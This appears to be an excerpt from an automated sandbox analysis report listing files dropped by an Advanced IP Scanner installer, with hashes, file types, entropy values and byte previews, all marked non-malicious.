                                                                                                                                                                                                  SHA1:B51A63F258B57527549D5331C405EACC77969433
                                                                                                                                                                                                  SHA-256:25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270
                                                                                                                                                                                                  SHA-512:1ACD8F7BC5D3AE1DB46824B3A5548B33E56C9BAC81DCD2E7D90FDBD1D3DD76F93CDF4D52A5F316728F92E623F73BC2CCD0BC505A259DFF20C1A5A2EB2F12E41B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................v............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-5KHP2.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21184
                                                                                                                                                                                                  Entropy (8bit):6.908629649625132
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:UzW2hWEgbCA0GftpBjJ6EKz3lvQyURz8X:y28i36bdvU2X
                                                                                                                                                                                                  MD5:1FA7C2B81CDFD7ACE42A2A9A0781C946
                                                                                                                                                                                                  SHA1:F5B7117D18A7335228829447E3ECCC7B806EF478
                                                                                                                                                                                                  SHA-256:CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD
                                                                                                                                                                                                  SHA-512:339CDAF8DE445CF05BC201400D65BB9037EA7A3782BA76864842ADB6FBE5445D06863227DD774AB50E6F582B75886B302D5DD152AFF1825CF90E4F252398ACE0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-5N8KK.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26514
                                                                                                                                                                                                  Entropy (8bit):5.365287004508335
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:nUzD+5WAlXcVhAB44F7JjbP2HvOqwtew5Mg+Xl+UWZhS4vr7:nMGWAlXcV+m4F7JjbP2P9wxMg+X4f9
                                                                                                                                                                                                  MD5:31966D909B8293307AC3545ACA55CD13
                                                                                                                                                                                                  SHA1:1B49E43C0109445BA5068E2ED8422CB308D99B12
                                                                                                                                                                                                  SHA-256:81B17400011DC60FD3CDBEDA6F52E3E848B0A8C754703CD32E4DBEB82A77C14B
                                                                                                                                                                                                  SHA-512:7CF39F060267A043DEAA52C7A1F7DBA00EB24957264C349D9322BD1E8506151A566E26FAB9B45ED5FEB7140EBE05A8AC89062DAF5D2FA4AE4845735036694EE8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........S....;...^...;.......;.......;.......;..>....O..VL...[..R&...^..,C...^..M...(5......G.......H,..K...K...;(..N:...x..V...?..._...W.......&.......KG...y..K................\......Sb...t..'....t..L&...t..U......;....j......5t......@...=...H5..T#..f...,g......@........M...........~../....`..3*...e..Um......U.......... =...A..*.y.....*.y...9.*.%.."..*.0.."7.+.....7.+.......+....f.+......+....#..G.......G....'..H0...U..Hw9...5.Hw9.....I....%..J6....0.J6......J6....b.J6...D..LD....|.L.b..V..M.S..<n.R.......V....,..Wi...U..W.T...S.Z.|..L..[f3..P..gc......w0K..B...H...".......W....T...s..."..0....~..2... d..A....T..*...2...........T.......Z..9.E..;..L.#..]g.M$o.....e.......l8...2Q...^..DL..I....0......=.......M.......TK..>......>...^..3..+...l...E.......5..5.l..Y..AV...%o.y....R....0..Nz......Mo......S...tb..1`...............m......N.......8.......I..(....N..1V...&|.R.....#.W.<..Zc.f.~...p......0j..1........^..1....5...O......h...c..An.;6...[..q.J..J...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-5RU84.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27607
                                                                                                                                                                                                  Entropy (8bit):4.7796924802259895
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:fDrEdeVx7lvwfFTCGmlTDZOqKvO2HMfhm:fDrEdolofFWGmlTDZOVGSIhm
                                                                                                                                                                                                  MD5:3AB470D0817DA632BCDA59AB7C24C08B
                                                                                                                                                                                                  SHA1:C2A643FF68C75A0573ED6A506427F3233848453C
                                                                                                                                                                                                  SHA-256:8E66FB8FB713DD256C72D5E007E041A6CD435A9A76406B9C345DFD0E3476A351
                                                                                                                                                                                                  SHA-512:A1B3A9F7AD04C9154EDF417FA3A6D80EEBCDA3A11E07588C0CEBE33A687A5B5985AD546DB4AC4CED02E1608295219807C464971CAA8F3F00ADD6E0794062F128
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........W....;...4...;...-...;.......;.. ....;..Bv...O..Z....[..Vr...^../I...^..RJ..(5...]..G.......H,..O*..K...>...N:......V...C..._...[.......(Z......OY...y..O........9..............W....t..*....t..PV...t..Z7.....?....j......5t...o..@...A...H5..X]..f.../s......Dr...................~..28...`..6z...e..Y.......Y.......... =...E..*.y...p.*.y.....*.%..$B.*.0..$m.+.......+.....T.+......+......+....&..G.......G....*}.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....n.J6...H7.LD......L.b..Zh.M.S..@..R.......V..../..Wi...YZ.W.T.....Z.|..Q..[f3..T..gc......w0K..F...H...%!......[N...T......."..4 ...~..6... d..D....T..-...2....1......X......._..9.E..?8.L.#..a..M$o.....e.....`.l8...5....^..Hp..I....`......A.......Q.......X...>...3..>......3../...l...I.......9..5.l..^#.AV...'..y....V....0..R.......Q.......X'..tb..4.......................S3......<b......M..(....Rz.1V...(..R....1=.W.<..^..f.~..!.......3...1........^..5#...5...m......<...c..ER.;6...`/.q.J..N...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-5URF2.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):6.986049300390525
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:CYaBWVghW/B7l9YOCAs/nGfe4pBjSfaMjWNArXVWQ4mW6qnajMHxxBNT0662ONLD:IBW2hWZ7QA0GftpBjj21lI663Un
                                                                                                                                                                                                  MD5:FC13F11A2458879B23C87B29C2BAD934
                                                                                                                                                                                                  SHA1:68B15CC21F5541DC2226E9E967E08AF81D04A537
                                                                                                                                                                                                  SHA-256:624841916513409C3CFCF45589EB96548C77B829E5D56A5783249D3AB7DC8998
                                                                                                                                                                                                  SHA-512:801A23485E42CC224E508212E7114E89747543A20964CF666EE801FCC2FEA97888FAA1AF8DA2AF807C50187969A08C6FCE2A021836811786EF72F4C2BDBDE33C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................l............ ...................<..............8............................................................................text...|........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-5VF9S.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1151
                                                                                                                                                                                                  Entropy (8bit):5.068076577523285
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFokcsuSRVXqhayHmP9a0Kt5RGDD4ReEhyv:HpcsRPXqhayHmP9a0U2DDSs
                                                                                                                                                                                                  MD5:1E41F2F1C303F750C96681515894C7B4
                                                                                                                                                                                                  SHA1:A6B4E2EC874030D50A0156E4A6CF2EF952F11455
                                                                                                                                                                                                  SHA-256:350321BFDAD2FD43E09E94DC59F47888B21BECA6EDAE3D23A7C90B7E246611C0
                                                                                                                                                                                                  SHA-512:ACA0D361A7EE82263804FC9C210FD829EFD6FD633F3053A9D7DE801C620FC4B981337721B6FEDA6D05F0E80289BC874B7B0AAE9B1E74C0320C14F00DA258B7FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>..</center></b></td><td><b><center>....</cent

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-67AJE.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27649
                                                                                                                                                                                                  Entropy (8bit):4.760709648438812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lDAmfKQkdX+kxl/Pnaz/ewJ5T5XTo5vJRaZ/igxcx9:7S/dOkx1Pnaz2wpeWOn
                                                                                                                                                                                                  MD5:C41CF1ECCEF6EB2CB6BBAF02A383BC28
                                                                                                                                                                                                  SHA1:B2E5D8721D04232F7219AC00496379C14576E33D
                                                                                                                                                                                                  SHA-256:61FD26C0CCFB205E3FA2E1F530FFE210F10A17ABEBDDA7DC085E404CEAB9FD69
                                                                                                                                                                                                  SHA-512:341FBEB45CFE794FE76E033383111BB404DAF630746996F7B7CEA49DE9953A93C75E332C50E37513639D5D521C4BAD2D37F44F5E94AA215221BBB1D148FEE4A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........W....;...X...;.......;...U...;..!?...;..B....O..Z....[..V....^../....^..Rh..(5......G....$..H,..Op..K...?T..N:......V...DQ.._...\.......(.......O....y..P........o.......t......W....t..*s...t..Pv...t..Zo.....@@...j...#..5t......@...B...H5..X...f.../.......E....................~..2....`..6....e..Y.......Z........(. =...F..*.y.....*.y...A.*.%..$..*.0..$..+.......+.......+....<.+......+....&..G.... M.G....*..H0...ZC.Hw9...q.Hw9...c.I....(r.J6....".J6......J6......J6...H..LD......L.b..Z..M.S..@..R.....\.V..../..Wi...Y..W.T.....Z.|..QE.[f3..U..gc......w0K..G<..H...%.......[....T......."..4T...~..6b.. d..E{...T......2....+......X......._M.9.E..?..L.#..a..M$o.....e.......l8...5....^..H...I....b......B4......R!......X...>...=..>......3../K..l...JN......9p.5.l..^C.AV...(1.y....V....0..R.......Q.......XM..tb..4................s......SS......<.......N..(....R..1V...)L.R....1..W.<..^..f.~..".......3...1........^..5e...5..............c..E..;6...`g.q.J..N...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-6H7V6.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):73408
                                                                                                                                                                                                  Entropy (8bit):5.811008103709619
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:nt2b2De5c4bFX2Jy2cvxXWpD9d3334BkZnkPgE79g:nw2De5c4bFX2Jy2cvxXWpD9d3334BkZ3
                                                                                                                                                                                                  MD5:1DD5666125B8734E92B1041139FA6C37
                                                                                                                                                                                                  SHA1:22E9566352E77AB15A917B45A86C0DC548431692
                                                                                                                                                                                                  SHA-256:D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3
                                                                                                                                                                                                  SHA-512:420B9184842ECD7969BF75F0D8A62569725624AE413C83EE3B6F26973318B4170287F657F2BE8DD3E7FC71264D69B2203E016D078615AD6E31E65033D5C59654
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................................................................@.............................8................................<..............8............................................................................text...H........................... ..`.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-6JV6K.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28561
                                                                                                                                                                                                  Entropy (8bit):5.2596092915719215
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:O4suMMyQmmoRKIKfAoMzI4VxECTwTPJBLCsDbn:tsuMMypm/M04MCYTL/n
                                                                                                                                                                                                  MD5:1D2AAC0633801D7DEF387CF78A968BFF
                                                                                                                                                                                                  SHA1:D4721BBF3AA690683DCD75B690080A9785BF81B5
                                                                                                                                                                                                  SHA-256:8FDF83BEB8D7E9D3CD0B77DDC636A77A1E4FF591ED10851229ED49BDC78644DF
                                                                                                                                                                                                  SHA-512:956759A441647A00FCEA9AA4BE7DBA4463DDC6DA2EBBBFDF697BAED99CEF55B924D72F92E3443251C5C64927FF37DE345F95C366920ADFE829823105C3EB0673
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........[H...;...D...;.......;.......;..!....;..Ef...O..^,...[..Y....^..0....^..U...(5...m..G.......H,..R...K...A...N:......V...F..._..._`......).......R....y..S........7..............[ ...t..+O...t..S....t..]......B....j......5t...y..@...D}..H5..[...f...1!......Gn.......a...........~..4....`..9....e..]E......]k......... =...H..*.y...f.*.y...u.*.%..%F.*.0..%o.+.......+.......+......+......+....'..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)@.J6......J6......J6......J6...K#.LD......L.b..^..M.S..C..R.......V....1O.Wi...\..W.T.....Z.|..Tm.[f3..Xd.gc......w0K..I...H...&-......^....T......."..6....~..8... d..G....T../W..2...........\L......b..9.E..B..L.#..e_.M$o...\.e.......l8...83...^..K`..I....J......D.......U_......\...>......>...z..3..0...l...L.......;..5.l..a..AV...(..y....ZW...0..V8......U.......[...tb..7.......................V.......?4......Q..(....U..1V...*&.R....2..W.<..b..f.~..".......5...1....g...^..7....5...[..........c..H@.;6...c..q.J..Q...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-72TDS.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 9 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25214
                                                                                                                                                                                                  Entropy (8bit):5.181706176676903
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:gZwwfjXDaFoDU90fQNBYNK30CCl77nQ6jtCuZEaaX/bv+NZmQDtLQIRLdc8ZDeO4:qLXDTQCQNmNa0CCl77nQ6viv6t2tMA
                                                                                                                                                                                                  MD5:3511FCBA762713FBC4D83979F300A383
                                                                                                                                                                                                  SHA1:61C33483A70C253FF38222021AD05E599F11E05C
                                                                                                                                                                                                  SHA-256:AD6B11E0F7B0E9DDD0B3440AA0C9308F18E385C7EBB78452A964F77A104B789E
                                                                                                                                                                                                  SHA-512:2CA49AE53A97FDD8AA857DFFFF281501506BAC8BD6B0D76B94CDA65592492A7DAA29FEC2CFD912DDBDCDEDEFF104BD21B00B2DED958C8BA7567536AFABE4D639
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:..............(...............h....... ..........&... ..............00......h.......00.................... .h....'.. .... ......,..00.... ..%...<..(....... ...............................................................................................0...33..;...;.....ffo..6...3...o...`...o...`...o...`...o...`...o...o.......ww...ffn......n.......n.......fffg.................................................................................(....... ...........@.......................B...!{..cs..{{{.sss.{sk..s...Z...c..{ss.1...9......................9...s....R..............)...!{...1..{....9.................B....B................{..!........J.........{)...s..........k...........{c..B.................!..)...B...9.....................{...c...R...!......1...1.......................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-7NPS4.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26334
                                                                                                                                                                                                  Entropy (8bit):5.237840743757654
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:sIX3LNpZy4imY2tBA01s0iMJ/vZYM2jeFxikFq2pkMPcK8LM+OEM4q78nkL9BHDS:TX3xpZy4BaMJ/vZJ2jeFxieN8LMkpk6
                                                                                                                                                                                                  MD5:6AB50593778FB5BD5D5422BDD90595E6
                                                                                                                                                                                                  SHA1:282946268660F41A7484BF19C30B7B958F6A82D4
                                                                                                                                                                                                  SHA-256:132676D1F5044AE5249B764B0CD4B67993932D121FBDDC13DB2AE75961562F0F
                                                                                                                                                                                                  SHA-512:359B8EE830E74575BDB7519F98180DD3440BBBE03DE9247F2FCF6A3EFD721DD1F56DB96DBF0D47E847EA6B6365BD5AD97DF6D5B277F5926622918FF05578DB37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........R....;...J...;...c...;.......;.......;..>....O..U....[..Q....^..+....^..M...(5...y..G.......H,..J...K...:...N:......V...?..._...V.......%.......K....y..Ki......................R....t..'....t..K....t..UK.....<....j......5t......@...=...H5..S...f...+.......@........;...........~...l...`..2....e..T.......T.......... =...A..*.y.....*.y.....*.%..!..*.0..!..+.....+.+.......+....Z.+....$.+....#..G.......G....'].H0...U%.Hw9.....Hw9.....I....%^.J6......J6......J6......J6...D).LD....d.L.b..Ur.M.S..<j.R.....0.V....+..Wi...Tr.W.T...m.Z.|..L..[f3..P..gc......w0K..B...H...".......VF...T...a..."..0L...~..2p.. d..@....T..*W..2...........S.......Y..9.E..;Z.L.#..\..M$o.....e.....".l8...2....^..D^..I....>......=.......MY......S...>......>...:..3..+e..l...E.......5..5.l..X..AV...%'.y....Q....0..N.......M.......SA..tb..1.......................Nk......8.......I..(....M..1V...&(.R....-..W.<..Y}.f.~...f....../...1........^..1k...5..............c..A@.;6...[..q.J..JL..I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-848E9.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23348
                                                                                                                                                                                                  Entropy (8bit):5.657948878761793
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:UmHzyMSIlmOvULptM3LeJi1od5LIBD6rNqHUIKM:UmHtllmOvULrM3LU7ZIBV
                                                                                                                                                                                                  MD5:EFD6D076AAD193007E77BFA1BB46E3DA
                                                                                                                                                                                                  SHA1:92B02FDC48FCA4BD721E5171FA9B66DA049F1CEB
                                                                                                                                                                                                  SHA-256:2AB7B0A9745CD011AD92F1EC49E1C8729A1401DEB23D1CC9180458DB386ED8F5
                                                                                                                                                                                                  SHA-512:11297FD0CB3C14EBD24A01289E24535C5E414534DCE43EEB87D2B5AFCE3B0335A9D32E4B042FF642D837FB5FA5FE4CB34AF732DCD50D8F43344D7DB592BEF925
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........H....;.......;.......;...s...;.......;..6....O..K....[..Gf...^..'U...^..C...(5...9..G.......H,..AX..K...3...N:......V...8..._...L.......!.......A....y..A................r......Hj...t..#....t..B<...t..J......4....j...A..5t...c..@...6...H5..I...f...'u......8....................~..)....`..-....e..J?......Je......... =...9..*.y.....*.y...i.*.%.....*.0...A.+.....E.+.......+....r.+......+.......G.....O.G....#q.H0...J..Hw9...5.Hw9.....I....!..J6......J6....j.J6......J6...;..LD......L.b..J..M.S..5..R.....P.V....'..Wi...I..W.T.....Z.|..B..[f3..F0.gc......w0K..:h..H...........K....T......."..+^...~..-... d..9....T..&1..2...........Iv......N..9.E..4V.L.#..Q..M$o.....e.......l8...,....^..;...I...........6D......C.......I7..>...a..>......3..'...l...<......./..5.l..M..AV...!C.y....G....0..DP......Ck......H...tb..+.......................D.......2*......@R.(....D..1V..."B.R....(..W.<..NY.f.~..........+...1........^..,G...5..........f...c..9P.;6...O..q.J..@...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-86H1S.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1177
                                                                                                                                                                                                  Entropy (8bit):4.903797892947706
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoybd/suSYXqZqH0vi4cS0Kt5RGDAM9ReEhyv:HH9sRYXqYHqSS0U2DAes
                                                                                                                                                                                                  MD5:5F29203D51A1A790B22063DE29E377AC
                                                                                                                                                                                                  SHA1:C0EDB2A7108E532E66D7B730466022403C64F50D
                                                                                                                                                                                                  SHA-256:C698D74D598B66CBDA7E11B80A6179AAD54AC7CCBA7127E517E4B5AC9FF4C6CD
                                                                                                                                                                                                  SHA-512:D451ADA494D387FA540F90C4F767451463ADFA3B81416E99DE14F2FCC39DD586677E359B0151CA8892BB18F847821D7B002F00D85886909A4F01D094195A27FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.llapot:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.ci.s rendszer:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gy.rt.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Felhaszn.l.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.pus:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Megjegyz.sek:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Szolg.ltat.s</center></b></td><td><

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-8AEO6.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1614189
                                                                                                                                                                                                  Entropy (8bit):5.107077482480661
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:p68vRRbvrqg2KwYbDmEZ3xm8JfAD2MGaYP63xwZjV4yhOKktsKCA4Zsdd:A
                                                                                                                                                                                                  MD5:7B844618B571CDACB552622844639A96
                                                                                                                                                                                                  SHA1:3103E22CC3EFE0B8EEB0F8664AF250BDF3FDA7C8
                                                                                                                                                                                                  SHA-256:8AA5F53559D9EDA03150CFDADC6273365311A3293631E7E467C4E881798A7885
                                                                                                                                                                                                  SHA-512:9BB645420DF1C61E8427D7A1E97067F4CC329F7A2CDB1B1957A0F05BC064967C3294DC3AE382C352A8DBB4EBF43612883C138216A3039012D37751F2EEB8A0BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:000009FFFFFF XEROX CORPORATION.00000AFFFFFF OMRON TATEISI ELECTRONICS CO..00000BFFFFFF MATRIX CORPORATION.00000CFFFFFF Cisco Systems, Inc.00000DFFFFFF FIBRONICS LTD..00000EFFFFFF FUJITSU LIMITED.00000FFFFFFF NEXT, INC..000010FFFFFF SYTEK INC..000011FFFFFF NORMEREL SYSTEMES.000012FFFFFF INFORMATION TECHNOLOGY LIMITED.000013FFFFFF CAMEX.000014FFFFFF NETRONIX.000015FFFFFF DATAPOINT CORPORATION.000016FFFFFF DU PONT PIXEL SYSTEMS ..000017FFFFFF Oracle.000018FFFFFF WEBSTER COMPUTER CORPORATION.000019FFFFFF APPLIED DYNAMICS INTERNATIONAL.00001AFFFFFF ADVANCED MICRO DEVICES.00001BFFFFFF Novell, Inc..00001CFFFFFF BELL TECHNOLOGIES.00001DFFFFFF Cabletron Systems, Inc..00001EFFFFFF TELSIST INDUSTRIA ELECTRONICA.00001FFFFFFF Telco Systems, Inc..000020FFFFFF DATAINDUSTRIER DIAB AB.000021FFFFFF SUREMAN COMP. & COMMUN. CORP..000022FFFFFF VISUAL TECHNOLOGY INC..000023FFFFFF ABB INDUSTRIAL SYSTEMS AB.000024FFFFFF CONNECT AS.000025FFFFFF RAMTEK CORP..000026FFFFFF SHA-KEN CO., LTD..000027FFFFFF JAPAN

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-8GEDB.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1158
                                                                                                                                                                                                  Entropy (8bit):4.820254321830803
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouCsuShXq+HRM98W0Kt5RGDK9HReEhyv:HnCsRhXq+Hw8W0U2DK9ds
                                                                                                                                                                                                  MD5:82043E0E5311A889AD7709A4A735BC76
                                                                                                                                                                                                  SHA1:F7E2ADBB76BF88A2761F489CB42AAFEF15C95E37
                                                                                                                                                                                                  SHA-256:9B401CE58F581FE4FF8ECECADBF4A4A4A83C3A0BFAE18A9D0FA9D0D1E6C1B990
